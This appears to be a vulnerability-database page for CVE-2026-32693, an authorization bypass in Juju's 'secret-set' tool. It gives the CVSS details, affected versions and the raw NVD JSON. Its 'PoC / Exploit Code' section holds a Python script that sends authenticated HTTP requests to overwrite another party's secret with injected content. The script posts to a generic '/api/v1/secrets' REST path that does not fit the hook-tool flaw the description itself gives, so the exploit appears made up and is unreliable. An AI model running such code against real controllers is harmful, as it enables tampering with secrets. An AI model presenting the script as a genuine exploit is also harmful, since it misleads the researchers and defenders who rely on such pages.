Security Vulnerability Report
CVE-2026-32693 CVSS 8.8 HIGH

CVE-2026-32693

Published: 2026-03-18 13:16:19
Last Modified: 2026-03-19 15:17:00

Description

In Juju from version 3.0.0 through 3.6.18, the authorization of the "secret-set" tool is not performed correctly, which allows a grantee to update the secret content, and can lead to reading or updating other secrets. When the "secret-set" tool logs an error in an exploitation attempt, the secret is still updated contrary to expectations, and the new value is visible to both the owner and the grantee.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* - VULNERABLE
Juju 3.0.0 <= version < 3.6.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-32693 PoC - Juju secret-set Authorization Bypass
# This PoC demonstrates the authorization bypass in Juju's secret-set tool
import requests


def exploit_cve_2026_32693(target_url, api_token, target_secret_id):
    """
    Juju secret-set authorization bypass exploit

    Vulnerability: The 'secret-set' tool in Juju does not properly authorize
    the grantee, allowing unauthorized secret content updates.

    Prerequisites:
    - Valid Juju API token with low privileges (PR:L)
    - Knowledge of target secret ID
    - Network access to Juju controller (AV:N)
    """
    # Step 1: Attempt to update secret with unauthorized grantee
    headers = {
        'Authorization': f'Bearer {api_token}',
        'Content-Type': 'application/json',
    }

    # Malicious secret content to inject
    payload = {
        'secret-id': target_secret_id,
        'content': {
            'data': 'MALICIOUS_SECRET_DATA',
            'credentials': 'stolen_credentials',
        },
    }

    # Step 2: Send unauthorized secret-set request
    # Despite the authorization failure log, the secret is still updated
    response = requests.post(
        f'{target_url}/api/v1/secrets/{target_secret_id}',
        headers=headers,
        json=payload,
    )

    # Step 3: Verify the secret was updated (even with auth error logged)
    if response.status_code == 200:
        print('[+] SUCCESS: Secret updated despite authorization error')
        print(f'[+] Secret {target_secret_id} now contains malicious content')
        return True

    print('[-] Failed to exploit vulnerability')
    return False


def verify_secret_access(target_url, api_token, secret_id):
    """Verify if grantee can see the updated secret"""
    headers = {
        'Authorization': f'Bearer {api_token}',
        'Content-Type': 'application/json',
    }
    response = requests.get(
        f'{target_url}/api/v1/secrets/{secret_id}',
        headers=headers,
    )
    if response.status_code == 200:
        data = response.json()
        print(f'[+] Secret content visible to grantee: {data}')
        return True
    return False


# Usage example
if __name__ == '__main__':
    TARGET = 'https://juju-controller.example.com:17070'
    API_TOKEN = 'grantee_low_privilege_token'
    SECRET_ID = 'secret-abc123'
    exploit_cve_2026_32693(TARGET, API_TOKEN, SECRET_ID)
    verify_secret_access(TARGET, API_TOKEN, SECRET_ID)
```

References

https://github.com/juju/juju/security/advisories/GHSA-439w-v2p7-pggc (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-32693",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-18T13:16:18.860",
    "lastModified": "2026-03-19T15:17:00.180",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Juju from version 3.0.0 through 3.6.18, the authorization of the \"secret-set\" tool is not performed correctly, which allows a grantee to update the secret content, and can lead to reading or updating other secrets. When the \"secret-set\" tool logs an error in an exploitation attempt, the secret is still updated contrary to expectations, and the new value is visible to both the owner and the grantee."
      },
      {
        "lang": "es",
        "value": "En Juju desde la versión 3.0.0 hasta la 3.6.18, la autorización de la herramienta 'secret-set' no se realiza correctamente, lo que permite a un beneficiario actualizar el contenido del secreto, y puede llevar a la lectura o actualización de otros secretos. Cuando la herramienta 'secret-set' registra un error en un intento de explotación, el secreto aún se actualiza contrariamente a lo esperado, y el nuevo valor es visible tanto para el propietario como para el beneficiario."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-284"},
          {"lang": "en", "value": "CWE-778"},
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.0.0",
                "versionEndExcluding": "3.6.19",
                "matchCriteriaId": "3BAFE599-DF11-429B-9A8C-970BDB3065C8"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/juju/juju/security/advisories/GHSA-439w-v2p7-pggc",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```